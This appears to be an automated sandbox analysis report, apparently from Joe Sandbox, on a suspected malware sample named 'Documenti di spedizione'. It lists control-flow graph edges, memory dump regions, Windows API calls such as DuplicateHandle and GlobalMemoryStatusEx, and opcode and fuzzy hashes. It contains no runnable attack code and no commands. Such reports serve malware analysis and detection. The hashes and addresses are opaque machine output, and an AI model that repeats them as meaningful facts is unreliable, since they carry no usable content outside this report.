39998->40003 40000 36812543 40001 3681224c 40001->40000 40007 36811780 40001->40007 40004 3681176f 40003->40004 40005 36811780 OleInitialize 40004->40005 40006 36812543 40004->40006 40005->40006 40006->40001 40008 36812578 OleInitialize 40007->40008 40009 368125dc 40008->40009 40009->40000 40010 36433458 40011 3643348e DuplicateHandle 40010->40011 40012 364334ee 40011->40012

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 92 3643d690-3643d69a 94 3643d6d2-3643d6e3 92->94 95 3643d69c-3643d6b0 92->95 96 3643d6b2 95->96 97 3643d6f7-3643d6fa 95->97 101 3643d6b4-3643d6ba 96->101 102 3643d6ea-3643d6f1 96->102 99 3643d732 97->99 100 3643d6fc-3643d712 97->100 104 3643d733-3643d743 99->104 105 3643d76a-3643d772 99->105 108 3643d714-3643d71a 100->108 109 3643d74a-3643d750 100->109 106 3643d6f2 101->106 107 3643d6bc-3643d6d0 101->107 102->106 110 3643d774-3643d77a 105->110 111 3643d7aa-3643d7af 105->111 112 3643d6f4-3643d6f6 106->112 113 3643d72a-3643d730 106->113 107->94 114 3643d752-3643d763 108->114 115 3643d71c-3643d723 108->115 109->114 116 3643d7b2-3643d7d0 call 3643aa84 110->116 117 3643d77c-3643d79a 110->117 111->116 112->97 113->99 121 3643d7d2 116->121 117->121 122 3643d79c-3643d7a9 117->122 139 3643d7d4 call 3643d690 121->139 140 3643d7d4 call 3643d7f0 121->140 122->111 123 3643d7d5-3643d7e6 124 3643d7e7-3643d817 123->124 125 3643d81e-3643d856 123->125 124->125 126 3643d861-3643d868 125->126 127 3643d858-3643d85e 125->127 128 3643d873-3643d912 CreateWindowExW 126->128 129 3643d86a-3643d870 126->129 127->126 131 3643d914-3643d91a 128->131 132 3643d91b-3643d953 128->132 129->128 131->132 136 3643d960 132->136 137 3643d955-3643d958 132->137 138 3643d961 136->138 137->136 138->138 139->123 140->123
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391209745.0000000036430000.00000040.00000800.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36430000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6
                                                  • API String ID: 0-498629140
                                                  • Opcode ID: 07986a3315e38b0e1214a061522c51513695600efd5a538f01035dcb0716be97
                                                  • Instruction ID: b859ba87b38669c545c93517720573b6bdf0a481870631162719e7d4776777cb
                                                  • Opcode Fuzzy Hash: 07986a3315e38b0e1214a061522c51513695600efd5a538f01035dcb0716be97
                                                  • Instruction Fuzzy Hash: C2A15BB5C0A3C8DFDB138FB5C850989BFB1BF0A210F29459BE4949B2A3D3359855CB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4;6$4;6
                                                  • API String ID: 0-3944953327
                                                  • Opcode ID: 4998dfe3061c367e435e11a79a4e1cb3e4d2e042e95d079439ae56640a076dbb
                                                  • Instruction ID: a801105c96db90c36a7de7f76a2e2e5898491e0a0a555117d3f13262b9d3990f
                                                  • Opcode Fuzzy Hash: 4998dfe3061c367e435e11a79a4e1cb3e4d2e042e95d079439ae56640a076dbb
                                                  • Instruction Fuzzy Hash: EF923638E00204CFEB16EF68C585B8ABBF2EB49354F6584A9D409AB351DB75EC81CF44

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1483 364456a0-364456bd 1484 364456bf-364456c2 1483->1484 1485 364456c4-364456c7 1484->1485 1486 364456cc-364456cf 1484->1486 1485->1486 1487 364456d1-364456de 1486->1487 1488 364456e3-364456e6 1486->1488 1487->1488 1489 364456fc-364456ff 1488->1489 1490 364456e8-364456f7 1488->1490 1492 36445701-36445716 1489->1492 1493 3644571b-3644571e 1489->1493 1490->1489 1492->1493 1494 36445720-36445727 1493->1494 1495 3644572c-3644572f 1493->1495 1494->1495 1497 36445731-36445734 1495->1497 1498 36445739-3644573c 1495->1498 1497->1498 1500 36445760-36445763 1498->1500 1501 3644573e-3644575b 1498->1501 1502 36445845-3644584b 1500->1502 1503 36445769-3644576c 1500->1503 1501->1500 1505 36445777-3644577d 1502->1505 1506 36445851 1502->1506 1507 36445772-36445775 1503->1507 1508 36445813-36445819 1503->1508 1513 36445880-364458ab 1505->1513 1514 36445783-3644578b 1505->1514 1511 36445856-36445859 1506->1511 1507->1505 1512 364457ad-364457b0 1507->1512 1509 364457f6-36445800 1508->1509 1510 3644581b 1508->1510 1530 36445807-36445809 1509->1530 1515 36445820-36445823 1510->1515 1519 36445860-36445862 1511->1519 1520 3644585b-3644585d 1511->1520 1516 364457b2-364457b3 1512->1516 1517 364457b8-364457bb 1512->1517 1536 364458b5-364458b8 1513->1536 1514->1513 1521 36445791-3644579e 1514->1521 1524 36445825-3644583b 1515->1524 1525 36445840-36445843 1515->1525 1516->1517 1526 364457cc-364457cf 1517->1526 1527 364457bd-364457c1 1517->1527 1528 36445864 1519->1528 1529 36445869-3644586c 1519->1529 1520->1519 1521->1513 1522 364457a4-364457a8 1521->1522 1522->1512 1524->1525 1525->1502 1525->1511 1533 364457d1-364457da 1526->1533 1534 364457db-364457de 1526->1534 1531 364457c7 1527->1531 1532 36445872-3644587f 1527->1532 1528->1529 1529->1484 1529->1532 1535 3644580e-36445811 1530->1535 1531->1526 1538 364457e0-364457e6 1534->1538 1539 364457f1-364457f4 1534->1539 1535->1508 1535->1515 1540 364458da-364458dd 1536->1540 1541 364458ba-364458be 1536->1541 1538->1497 1542 364457ec 1538->1542 1539->1509 1539->1535 1545 364458ee-364458f1 1540->1545 1546 364458df-364458e9 1540->1546 1543 364458c4-364458cc 1541->1543 1544 364459a6-364459e3 1541->1544 1542->1539 1543->1544 1547 364458d2-364458d5 1543->1547 1558 364459e5-364459e8 1544->1558 1548 36445913-36445916 1545->1548 1549 364458f3-364458f7 1545->1549 1546->1545 1547->1540 1550 36445934-36445937 1548->1550 1551 36445918-3644591c 1548->1551 1549->1544 1554 364458fd-36445905 1549->1554 1556 3644594f-36445952 1550->1556 1557 36445939-3644594a 1550->1557 1551->1544 1555 36445922-3644592a 1551->1555 1554->1544 1559 3644590b-3644590e 1554->1559 1555->1544 1560 3644592c-3644592f 1555->1560 1561 36445954-3644595b 1556->1561 1562 3644595c-3644595f 1556->1562 1557->1556 1563 36445a07-36445a0a 1558->1563 1564 364459ea-364459fc 1558->1564 1559->1548 1560->1550 1566 36445961-36445965 1562->1566 1567 36445979-3644597c 1562->1567 1568 36445a14-36445a17 1563->1568 1569 36445a0c-36445a11 1563->1569 1580 36445a02 1564->1580 1581 36445d8b-36445d90 1564->1581 1566->1544 1571 36445967-3644596f 1566->1571 1572 3644598c-3644598e 1567->1572 1573 3644597e-36445985 1567->1573 1574 36445a75-36445be1 1568->1574 1575 36445a19-36445a1c 1568->1575 1569->1568 1571->1544 1582 36445971-36445974 1571->1582 1578 36445995-36445998 1572->1578 1579 36445990 1572->1579 1583 36445987 1573->1583 1584 3644599e-364459a5 1573->1584 1632 36445be7-36445bee 1574->1632 1633 36445d19-36445d2c 1574->1633 1576 36445a1e-36445a30 1575->1576 1577 36445a3b-36445a3e 1575->1577 1595 36445a36 1576->1595 1596 36445d6d-36445d7f 1576->1596 1585 36445a45-36445a48 1577->1585 1586 36445a40-36445a42 1577->1586 1578->1536 1578->1584 1579->1578 1580->1563 1587 36445d93-36445d95 1581->1587 1582->1567 1583->1572 1590 36445a67-36445a6a 1585->1590 1591 36445a4a-36445a5c 1585->1591 1586->1585 1592 36445d97 1587->1592 1593 36445d9c-36445d9f 1587->1593 1590->1574 1597 36445a6c-36445a6f 1590->1597 1603 36445d52-36445d65 1591->1603 1604 36445a62 1591->1604 1592->1593 1593->1558 1598 36445da5-36445dae 1593->1598 1595->1577 1596->1581 1607 36445d81 1596->1607 1597->1574 1600 36445d2f-36445d32 1597->1600 1605 36445d34-36445d46 1600->1605 1606 36445d4d-36445d50 1600->1606 1604->1590 1605->1581 1613 36445d48 1605->1613 1606->1603 1608 36445d68-36445d6b 1606->1608 1610 36445d86-36445d89 1607->1610 1608->1596 1608->1610 1610->1581 1610->1587 1613->1606 1634 36445bf4-36445c26 1632->1634 1635 36445ca1-36445ca8 1632->1635 1645 36445c28 1634->1645 1646 36445c2b-36445c6c 1634->1646 1635->1633 1636 36445caa-36445cdd 1635->1636 1648 36445ce2-36445d0f 1636->1648 1649 36445cdf 1636->1649 1645->1646 1657 36445c84-36445c8b 1646->1657 1658 36445c6e-36445c7f 1646->1658 1648->1598 1649->1648 1660 36445c93-36445c95 1657->1660 1658->1598 1660->1598
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t1313
                                                  • API String ID: 0-3632169711
                                                  • Opcode ID: 17ec18568b44140a2cf5b9a920bd6146b099ec6a8a0cd6040615c758644f563f
                                                  • Instruction ID: 4636596185f8011a37e640f21967bb3dec9d149d896abb38e3ea296cb459eac3
                                                  • Opcode Fuzzy Hash: 17ec18568b44140a2cf5b9a920bd6146b099ec6a8a0cd6040615c758644f563f
                                                  • Instruction Fuzzy Hash: C112E179F102159BFF1AEB64C88169EB7A2EF85360F248429D809EB345DE35DC46CB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1661 36443158-36443179 1662 3644317b-3644317e 1661->1662 1663 36443184-364431a3 1662->1663 1664 3644391f-36443922 1662->1664 1673 364431a5-364431a8 1663->1673 1674 364431bc-364431c6 1663->1674 1665 36443924-36443943 1664->1665 1666 36443948-3644394a 1664->1666 1665->1666 1668 36443951-36443954 1666->1668 1669 3644394c 1666->1669 1668->1662 1671 3644395a-36443963 1668->1671 1669->1668 1673->1674 1676 364431aa-364431ba 1673->1676 1679 364431cc-364431db 1674->1679 1676->1679 1787 364431dd call 36443970 1679->1787 1788 364431dd call 36443978 1679->1788 1680 364431e2-364431e7 1681 364431f4-364434d1 1680->1681 1682 364431e9-364431ef 1680->1682 1703 364434d7-36443586 1681->1703 1704 36443911-3644391e 1681->1704 1682->1671 1713 364435af 1703->1713 1714 36443588-364435ad 1703->1714 1715 364435b8-364435cb 1713->1715 1714->1715 1718 364435d1-364435f3 1715->1718 1719 364438f8-36443904 1715->1719 1718->1719 1722 364435f9-36443603 1718->1722 1719->1703 1720 3644390a 1719->1720 1720->1704 1722->1719 1723 36443609-36443614 1722->1723 1723->1719 1724 3644361a-364436f0 1723->1724 1736 364436f2-364436f4 1724->1736 1737 364436fe-3644372e 1724->1737 1736->1737 1741 36443730-36443732 1737->1741 1742 3644373c-36443748 1737->1742 1741->1742 1743 364437a8-364437ac 1742->1743 1744 3644374a-3644374e 1742->1744 1745 364437b2-364437ee 1743->1745 1746 364438e9-364438f2 1743->1746 1744->1743 1747 36443750-3644377a 1744->1747 1757 364437f0-364437f2 1745->1757 1758 364437fc-3644380a 1745->1758 1746->1719 1746->1724 1754 3644377c-3644377e 1747->1754 1755 36443788-364437a5 1747->1755 1754->1755 1755->1743 1757->1758 1761 36443821-3644382c 1758->1761 1762 3644380c-36443817 1758->1762 1766 36443844-36443855 1761->1766 1767 3644382e-36443834 1761->1767 1762->1761 1765 36443819 1762->1765 1765->1761 1771 36443857-3644385d 1766->1771 1772 3644386d-36443879 1766->1772 1768 36443836 1767->1768 1769 36443838-3644383a 1767->1769 1768->1766 1769->1766 1773 36443861-36443863 1771->1773 1774 3644385f 1771->1774 1776 36443891-364438e2 1772->1776 1777 3644387b-36443881 1772->1777 1773->1772 1774->1772 1776->1746 1778 36443885-36443887 1777->1778 1779 36443883 1777->1779 1778->1776 1779->1776 1787->1680 1788->1680
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6;6
                                                  • API String ID: 0-4172407541
                                                  • Opcode ID: 214979148c43de41d5611908b5eb89c8cff8946ffc369edbe3e7769d96f9a03a
                                                  • Instruction ID: 83691b7fc43255a37afbbde5ce4adf41f8673f03fb7293a49151b983af2d5a8a
                                                  • Opcode Fuzzy Hash: 214979148c43de41d5611908b5eb89c8cff8946ffc369edbe3e7769d96f9a03a
                                                  • Instruction Fuzzy Hash: AB323C34E1071ACBDB15EB65C89059DF7B6FFC9700F6096AAD409A7210EF31AE85CB80
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78e025b3dcf35d094ac6c06c14f6db0c19b23900f3c45d993043fe5efd7c693b
                                                  • Instruction ID: b372456e5c6ba072045cee28b991762a4630bffb29db8cd7ca808334c995a9ac
                                                  • Opcode Fuzzy Hash: 78e025b3dcf35d094ac6c06c14f6db0c19b23900f3c45d993043fe5efd7c693b
                                                  • Instruction Fuzzy Hash: C5328134F002158FEB16EB68C991B9DBBB2FB8A350F248529D505E7351DB35EC42CB94
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17c19fb6ec15d4440c0304a85446e33eaa5840077595338c83559fbe94d31b10
                                                  • Instruction ID: 4c9ab9fab4b817baeaefbfccfaf46a806c9dabfdd6cca4b1eee938a9d9c8553a
                                                  • Opcode Fuzzy Hash: 17c19fb6ec15d4440c0304a85446e33eaa5840077595338c83559fbe94d31b10
                                                  • Instruction Fuzzy Hash: 89227474E102098FFB17EBA9C89179DB7B6EF89350F60852AE405EB391CA35DC81CB51

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 3643328E
                                                  • GetCurrentThread.KERNEL32 ref: 364332CB
                                                  • GetCurrentProcess.KERNEL32 ref: 36433308
                                                  • GetCurrentThreadId.KERNEL32 ref: 36433361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391209745.0000000036430000.00000040.00000800.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36430000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: Y43PZ43
                                                  • API String ID: 2063062207-2662788892
                                                  • Opcode ID: 68fbbeca00051a2e6b6c10682decc20bf62693c8f423f3bb696bb1b68f3afe11
                                                  • Instruction ID: f2767cbf4e3720557dae127005b4bf57c4817a4c8cf78de074bf7044a2e4bc03
                                                  • Opcode Fuzzy Hash: 68fbbeca00051a2e6b6c10682decc20bf62693c8f423f3bb696bb1b68f3afe11
                                                  • Instruction Fuzzy Hash: 365126B0D012498FDB54CFAAC944BDEBBF1EF89310F248459E519A7350EB74A940CFA6

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 3643328E
                                                  • GetCurrentThread.KERNEL32 ref: 364332CB
                                                  • GetCurrentProcess.KERNEL32 ref: 36433308
                                                  • GetCurrentThreadId.KERNEL32 ref: 36433361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391209745.0000000036430000.00000040.00000800.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36430000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: Y43PZ43
                                                  • API String ID: 2063062207-2662788892
                                                  • Opcode ID: 3d23078df259d3401756cf7338c3161d94f49250189595683986825ef6d45c60
                                                  • Instruction ID: b60a2d4d99caf33d9d99c392d8aff2b20d3e44b242391ad77fc47d73d6e6cf43
                                                  • Opcode Fuzzy Hash: 3d23078df259d3401756cf7338c3161d94f49250189595683986825ef6d45c60
                                                  • Instruction Fuzzy Hash: 675135B0D012498FDB44CFAAC948BDEBBF1AF89310F248059E519A7350EB749940CBA6

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 45 36444c68-36444c8c 46 36444c8e-36444c91 45->46 47 36444cb2-36444cb5 46->47 48 36444c93-36444cad 46->48 49 36445394-36445396 47->49 50 36444cbb-36444db3 47->50 48->47 52 3644539d-364453a0 49->52 53 36445398 49->53 68 36444e36-36444e3d 50->68 69 36444db9-36444e06 call 36445511 50->69 52->46 55 364453a6-364453b3 52->55 53->52 70 36444ec1-36444eca 68->70 71 36444e43-36444eb3 68->71 82 36444e0c-36444e28 69->82 70->55 88 36444eb5 71->88 89 36444ebe 71->89 86 36444e33-36444e34 82->86 87 36444e2a 82->87 86->68 87->86 88->89 89->70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: x=;6$x=;6$13
                                                  • API String ID: 0-2851432867
                                                  • Opcode ID: 3ef094606b047614902dcc89f835afbea3b073919f14e95bc12bb32d879358a6
                                                  • Instruction ID: b6119c9a9b515e579076e430c5d360d62ed722c09f7252a161d9b03b666ca3ac
                                                  • Opcode Fuzzy Hash: 3ef094606b047614902dcc89f835afbea3b073919f14e95bc12bb32d879358a6
                                                  • Instruction Fuzzy Hash: 5E618D30F002189FFB15ABA4C8557AEBBF6EF88300F208529E509AB395DF758D458F90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 141 de7f9-de813 142 de83d-de853 141->142 143 de815-de83c 141->143 164 de855 call de7f9 142->164 165 de855 call de8e0 142->165 146 de85a-de85c 147 de85e-de861 146->147 148 de862-de8c1 146->148 155 de8c7-de954 GlobalMemoryStatusEx 148->155 156 de8c3-de8c6 148->156 160 de95d-de985 155->160 161 de956-de95c 155->161 161->160 164->146 165->146
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3368879389.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: B6
                                                  • API String ID: 0-1277995745
                                                  • Opcode ID: 226ac848827d7a1e450e6121d3c733e8f3221ffdd4b29059ee0e773f4b88a8fe
                                                  • Instruction ID: 312e19c641fc67e53add2dd074790384132396bf06f9b0c1149ac06f10b05e79
                                                  • Opcode Fuzzy Hash: 226ac848827d7a1e450e6121d3c733e8f3221ffdd4b29059ee0e773f4b88a8fe
                                                  • Instruction Fuzzy Hash: CB414332D043969FCB14DF69D8102AEBBF5AF8A310F1485ABD948E7340DB789844CBE1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1436 36444c59-36444c8c 1437 36444c8e-36444c91 1436->1437 1438 36444cb2-36444cb5 1437->1438 1439 36444c93-36444cad 1437->1439 1440 36445394-36445396 1438->1440 1441 36444cbb-36444db3 1438->1441 1439->1438 1443 3644539d-364453a0 1440->1443 1444 36445398 1440->1444 1459 36444e36-36444e3d 1441->1459 1460 36444db9-36444e06 call 36445511 1441->1460 1443->1437 1446 364453a6-364453b3 1443->1446 1444->1443 1461 36444ec1-36444eca 1459->1461 1462 36444e43-36444eb3 1459->1462 1473 36444e0c-36444e28 1460->1473 1461->1446 1479 36444eb5 1462->1479 1480 36444ebe 1462->1480 1477 36444e33-36444e34 1473->1477 1478 36444e2a 1473->1478 1477->1459 1478->1477 1479->1480 1480->1461
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391227667.0000000036440000.00000040.00000800.00020000.00000000.sdmp, Offset: 36440000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36440000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: x=;6$13
                                                  • API String ID: 0-2780380675
                                                  • Opcode ID: 24227a37dae7a4a435c18ed7cbcdabfaf6085731fbd217a740c4f23604c551d2
                                                  • Instruction ID: 07efc7d49f020036dac004e9d46023fa956c9fc344e794a74ecb72817272bd8a
                                                  • Opcode Fuzzy Hash: 24227a37dae7a4a435c18ed7cbcdabfaf6085731fbd217a740c4f23604c551d2
                                                  • Instruction Fuzzy Hash: BD519E30F102189FEB159FA9C855BAEBBF6FF88700F208529E105AB395DE719C059F90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1935 3643d7f0-3643d856 1937 3643d861-3643d868 1935->1937 1938 3643d858-3643d85e 1935->1938 1939 3643d873-3643d912 CreateWindowExW 1937->1939 1940 3643d86a-3643d870 1937->1940 1938->1937 1942 3643d914-3643d91a 1939->1942 1943 3643d91b-3643d953 1939->1943 1940->1939 1942->1943 1947 3643d960 1943->1947 1948 3643d955-3643d958 1943->1948 1949 3643d961 1947->1949 1948->1947 1949->1949
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3643D902
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391209745.0000000036430000.00000040.00000800.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36430000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: a39382ee5be039306114b5649ef9d61cb8ee850dda06d4a54d6ea31be1834821
                                                  • Instruction ID: 2c46756ce76f5ea12f32a77b9b9fc95903e410e5388984e655e6f8a359402d78
                                                  • Opcode Fuzzy Hash: a39382ee5be039306114b5649ef9d61cb8ee850dda06d4a54d6ea31be1834821
                                                  • Instruction Fuzzy Hash: 8241B0B1D00349DFDF14CFAAC894ADEBBB5BF49310F60812AE818AB210D775A955CF91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1950 36810040-3681007c 1951 36810082-36810087 1950->1951 1952 3681012c-3681014c 1950->1952 1953 36810089-368100c0 1951->1953 1954 368100da-36810112 CallWindowProcW 1951->1954 1958 3681014f-3681015c 1952->1958 1960 368100c2-368100c8 1953->1960 1961 368100c9-368100d8 1953->1961 1956 36810114-3681011a 1954->1956 1957 3681011b-3681012a 1954->1957 1956->1957 1957->1958 1960->1961 1961->1958
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 36810101
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391424740.0000000036810000.00000040.00000800.00020000.00000000.sdmp, Offset: 36810000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36810000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: c68a52f58d959633e752e69ca4be97e73d02040f6e47dac1174b5e7e06535851
                                                  • Instruction ID: 5c9a553e2c7e381e3580369bb4566643554f4cd8690e48ad76301e6c0e7a6cad
                                                  • Opcode Fuzzy Hash: c68a52f58d959633e752e69ca4be97e73d02040f6e47dac1174b5e7e06535851
                                                  • Instruction Fuzzy Hash: 3241F7B9A00309CFDB04CF9AC848A9ABBF5FF8D314F248459D518AB321D775A841CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1964 36433450-36433456 1965 36433458-36433487 1964->1965 1966 3643348e-364334ec DuplicateHandle 1964->1966 1965->1966 1967 364334f5-36433512 1966->1967 1968 364334ee-364334f4 1966->1968 1968->1967
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 364334DF
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391209745.0000000036430000.00000040.00000800.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36430000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 4a9e42a297804c24b0d7b997fec853a510d0c7d95d99d612de0bef3a3921c20f
                                                  • Instruction ID: 409c540ab3c0def84fae5c102bc422d91ed6f70010f27fb40ea81c66924d13cb
                                                  • Opcode Fuzzy Hash: 4a9e42a297804c24b0d7b997fec853a510d0c7d95d99d612de0bef3a3921c20f
                                                  • Instruction Fuzzy Hash: 312116B5D002499FDB11CFAAD985ADEFBF4FB49310F24801AE914A7310D375A950CF61
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 364334DF
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391209745.0000000036430000.00000040.00000800.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36430000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 5328966ef91093cc44e8507b8f82a9a8b5804e53ccdd5da25eba4f1efd362b92
                                                  • Instruction ID: 981ed9bf1fba78826eb62b76528a311f13cc9408704b538a90044015257ab0ab
                                                  • Opcode Fuzzy Hash: 5328966ef91093cc44e8507b8f82a9a8b5804e53ccdd5da25eba4f1efd362b92
                                                  • Instruction Fuzzy Hash: A321E4B5D002499FDB10CFAAD984ADEFBF4FB48320F14801AE918A7310D379A950CF61
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 000DE947
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3368879389.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 837b7ed72e7436dc1e2ca6ea9971e57b68d3b1a9740a607f05fa07504dafc3d2
                                                  • Instruction ID: 07118a80e2fa0a98c34319efa2b5a569ba7be53a58d1975803a02f9413a73f53
                                                  • Opcode Fuzzy Hash: 837b7ed72e7436dc1e2ca6ea9971e57b68d3b1a9740a607f05fa07504dafc3d2
                                                  • Instruction Fuzzy Hash: F51112B1C0065A9FCB10CFAAC544B9EFBF4AF48320F14812AD918A7240D7B8A954CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 368125CD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391424740.0000000036810000.00000040.00000800.00020000.00000000.sdmp, Offset: 36810000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36810000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 0f4f2d3e7bba1d4ec00c65f61e72a40ae24102d478cc150a37ac37a4debd8867
                                                  • Instruction ID: ccec37e2e00cd32c155da92ac8616bf44a43168460c6e2cd4f23dd5dc63c5277
                                                  • Opcode Fuzzy Hash: 0f4f2d3e7bba1d4ec00c65f61e72a40ae24102d478cc150a37ac37a4debd8867
                                                  • Instruction Fuzzy Hash: 6F1155B5900249CFDB10CFAAD885BDEFBF4EB48310F20855AD118A7300D379A584CBA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 368125CD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3391424740.0000000036810000.00000040.00000800.00020000.00000000.sdmp, Offset: 36810000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_36810000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: c78812c892e046811550382b0aa389a0be4058675626436a60e0263dea428039
                                                  • Instruction ID: 22a45e2eb0849f88e259949df3117c9a683a206c9f620d8265252efef6fb1847
                                                  • Opcode Fuzzy Hash: c78812c892e046811550382b0aa389a0be4058675626436a60e0263dea428039
                                                  • Instruction Fuzzy Hash: 691133B59043488FDB50CFAAC885BDEFBF4EB48320F208419D518A7200D378A944CBA5
                                                  Strings
                                                  Memory Dump Source
